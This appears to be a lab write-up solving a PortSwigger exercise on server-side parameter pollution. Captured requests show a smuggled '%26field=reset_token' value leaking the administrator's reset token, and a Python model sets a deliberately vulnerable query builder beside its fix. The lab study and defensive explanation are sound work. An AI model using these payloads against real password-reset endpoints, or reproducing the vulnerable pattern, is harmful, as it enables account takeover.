PortSwigger study notes: Exploiting server-side parameter pollution in a query string


portswigger.net/web-securit…

1 Overview

To solve the lab, log in as the administrator and delete carlos.

2 Required knowledge

To solve this lab, you'll need to know:

  • How to use URL query syntax to attempt to change a server-side request.
  • How to use error messages to build an understanding of how a server-side API processes user input.

These points are covered in our API Testing Academy topic.

3 Lab approach

3.1 Normal business flow

  1. From the PortSwigger lab description page, launch the lab and click My account.

  2. The login page asks for a username and a password. The lab only gives us a username, so try the password-recovery function by clicking Forgot password?

  3. On the forgot-password page, enter the username and inspect the response:

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 49

{"type":"email","result":"*****@normal-user.net"}

At this point every function reachable from the normal page UI has been exercised.

3.2 Solution approach

  1. Review all requests in Burp Suite, paying particular attention to responses with MIME type JSON and to JS files.

  2. A JS file reveals a hidden endpoint: the reset-password endpoint used by the forgot-password flow.

window.location.href = `/forgot-password?reset_token=${resetToken}`;

  3. Analyse the request and response of the forgot-password endpoint. Relating this to step 2, the goal is to obtain the reset_token from this endpoint.

Request:

POST /forgot-password HTTP/2
Host: 0ad4004a04b943b082fe7a170049001b.web-security-academy.net
Cookie: session=wOaQvACArgsWkjNSfPJiFK3PRBzLid2L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://0ad4004a04b943b082fe7a170049001b.web-security-academy.net/forgot-password
Content-Type: x-www-form-urlencoded
Content-Length: 60
Origin: https://0ad4004a04b943b082fe7a170049001b.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

csrf=HX0JNPBxshNQShsi8jtxRPMvofsuJSy6&username=administrator

Response:

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 49

{"type":"email","result":"*****@normal-user.net"}

  4. Look for hidden parameters that influence the server-side logic. The first idea is to override the email, so that the password-reset token is sent to an address of my choosing.

Modify the request body by appending &email=1:
csrf=iD1m6AqR2S8TGapUzeVgignHwEDHdDJ7&username=administrator&email=1

The response is unchanged:

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 49

{"type":"email","result":"*****@normal-user.net"}

-------------------------------divider-----------------------------------

Modify the request body by appending %26email=1 instead:
csrf=iD1m6AqR2S8TGapUzeVgignHwEDHdDJ7&username=administrator%26email=1

Response: this time it is an error, which shows the server-side request was affected. The key point is URL-encoding the & as %26: the front-end decodes it once, so a literal & ends up in the query string of its server-side request.

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 40

{"error": "Parameter is not supported."}

  5. After several attempts, the key parameter turned out to be field. It directly controls the server-side processing logic and lets us obtain the reset_token.

Append %26field=username to the request body:
csrf=iD1m6AqR2S8TGapUzeVgignHwEDHdDJ7&username=administrator%26field=username

Response:

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 44

{"result":"administrator","type":"username"}

-------------------------------divider-----------------------------------

Append %26field=reset_token to the request body:
csrf=iD1m6AqR2S8TGapUzeVgignHwEDHdDJ7&username=administrator%26field=reset_token

Response:

HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 66

{"result":"rtam20wzikva6pxec10rbcqzou11yojn","type":"reset_token"}

  6. Use the obtained reset_token to visit /forgot-password?reset_token=${resetToken}, replacing resetToken with the value obtained in step 5, and reset the administrator password.

  7. Return to the login page, log in as administrator with the new password, and click Admin panel.

  8. Delete the user carlos.

  9. The lab is now complete: the user carlos has been deleted.
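The root cause this walkthrough exercises is a server-side request assembled by string concatenation from a value the front-end has already URL-decoded once. The following is an added example, not code from the original post or from PortSwigger's lab: it models a hypothetical front-end that builds an internal query from the submitted username, reproduces the two observed behaviours (an unknown parameter is rejected with the "Parameter is not supported." error seen above, and an injected field overrides the one the front-end intended), and shows the fix, which is to percent-encode the value with urllib.parse.urlencode and to refuse any field the front-end never asked for. The internal path /api/lookup, the user store, the token and email values, the "Invalid field." / "Unknown user." error strings and the rule that the first repeated parameter wins are all assumptions made for the model.

```python
from urllib.parse import parse_qs, urlencode, urlsplit

# Hypothetical internal API location; the lab's real server-side endpoint is not shown on the page.
INTERNAL_BASE = "http://internal-api.local/api/lookup"

# Constructed user store standing in for the lab back end (values are placeholders).
USERS = {
    "administrator": {
        "email": "admin@example.net",
        "reset_token": "example-token-0000",
    },
}

# Parameters and field names the internal API accepts (assumed).
SUPPORTED_PARAMS = {"username", "field"}
SUPPORTED_FIELDS = {"email", "username", "reset_token"}
# The only field the front-end should ever request for an anonymous caller.
FRONTEND_ALLOWED_FIELDS = {"email"}


def form_value(body: str, name: str) -> str:
    """First parse: the front-end decodes the submitted form body once.
    parse_qs percent-decodes values, so username=administrator%26field=x
    yields the string 'administrator&field=x' containing a literal ampersand."""
    return parse_qs(body, keep_blank_values=True)[name][0]


def build_vulnerable(username: str) -> str:
    """Vulnerable pattern: the already-decoded value is concatenated straight
    into the internal query string, so a literal '&' inside it becomes a new parameter."""
    return f"{INTERNAL_BASE}?username={username}&field=email"


def build_hardened(username: str) -> str:
    """Fix: urlencode percent-encodes '&', '=' and '#' inside the value, so the
    internal API sees exactly one username parameter and one field parameter."""
    return f"{INTERNAL_BASE}?{urlencode({'username': username, 'field': 'email'})}"


def internal_api(url: str) -> dict:
    """Model of the internal API (constructed to match the responses on the page).
    Assumption: when a parameter is repeated, the first occurrence wins, which is
    what the responses to %26field=username and %26field=reset_token suggest."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if set(params) - SUPPORTED_PARAMS:
        return {"error": "Parameter is not supported."}
    username = params.get("username", [""])[0]
    field = params.get("field", [""])[0]
    if field not in SUPPORTED_FIELDS:
        return {"error": "Invalid field."}
    user = USERS.get(username)
    if user is None:
        return {"error": "Unknown user."}
    value = username if field == "username" else user[field]
    return {"result": value, "type": field}


def forgot_password(body: str, build=build_hardened) -> dict:
    """Front-end handler: one decode of the form body, then one internal request.
    Defence in depth: even if the URL builder is wrong, never relay a field the
    front-end did not ask for (this is what would stop the reset_token leaking)."""
    username = form_value(body, "username")
    response = internal_api(build(username))
    if "type" in response and response["type"] not in FRONTEND_ALLOWED_FIELDS:
        return {"error": "Unexpected field in internal response."}
    return response


if __name__ == "__main__":
    # Constructed request body in the shape of the one captured in the lab.
    body = "csrf=EXAMPLE-CSRF-TOKEN&username=administrator%26field=reset_token"
    print("vulnerable builder:", internal_api(build_vulnerable(form_value(body, "username"))))
    print("hardened builder:  ", forgot_password(body))
```

Run it and the vulnerable builder returns the reset token for the polluted username, while the hardened builder turns the whole decoded value into a single (non-existent) username. The allow-list check in forgot_password is a second, independent control: it does not prevent the pollution, but it prevents the polluted result from reaching the caller.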